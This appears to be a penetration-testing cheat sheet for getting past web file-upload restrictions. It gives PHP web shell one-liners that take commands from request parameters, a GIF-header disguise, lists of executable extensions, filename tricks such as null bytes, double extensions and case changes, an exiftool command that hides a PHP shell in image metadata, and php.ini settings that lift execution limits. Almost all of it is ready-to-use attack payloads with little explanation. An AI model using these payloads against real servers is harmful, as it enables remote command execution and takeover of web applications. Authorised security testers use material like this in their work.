File Upload bypass

File Upload bypass

Content

1
GIF89a1
2
<?php $a=system($_GET['cmd']); echo $a;?>
3
<?php system('whoami'); ?>
4
<?php exec('whoami'); ?>
5
<?php passthru('whoami'); ?>
6
<?php shell_exec('whoami'); ?>
7
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
8
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>
Copied!

Filters

1
evil.png;.php
2
evil.gif.php
3
evil.gif.php5
4
evil.php;gif
5
evil.config
6
evil.htaccess
7
8
--other-extensions--
9
php3
10
php4
11
php5
12
php7
13
pht
14
phtm
15
phtml
16
phar
17
phps
Copied!
Other extensions
1
PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc
2
ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
3
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
4
Coldfusion: .cfm, .cfml, .cfc, .dbm
5
Flash: .swf
6
Perl: .pl, .cgi
7
Erlang Yaws Web Server: .yaws
Copied!

Bypass file extensions checks

-Try upper cases: pHp, .pHP5, .PhAr ... -Add a valid extension before the execution extension: file.png.Php5 -Add special characters at the end. Use burpsuite-intruder to make it easy.
1
file.php%20
2
file.php%0a
3
file.php%00
4
file.php%0d%0a
5
file.php/
6
file.php.\
7
file.
8
file.php....
9
file.pHp5....
Copied!
-Try to bypass the protections tricking the extension parser of the server-side with techniques like doubling the extension or adding junk data (null bytes) between extensions.
1
file.png.php
2
file.png.pHp5
3
file.php%00.png
4
file.php\x00.png
5
file.php%0a.png
6
file.php%0d%0a.png
7
flile.phpJunk123png
Copied!

Metatag with exif tool

1
exiftool -Comment='<?php system($_REQUEST['cmd']); ?>' test.png
Copied!

php.ini file to bypass restrictions

1
safe_mode = Off
2
disable_functions = NONE
3
safe_mode_gid = OFF
4
open_basedir = OFF
5
exec = ON
6
shell_exec = ON
Copied!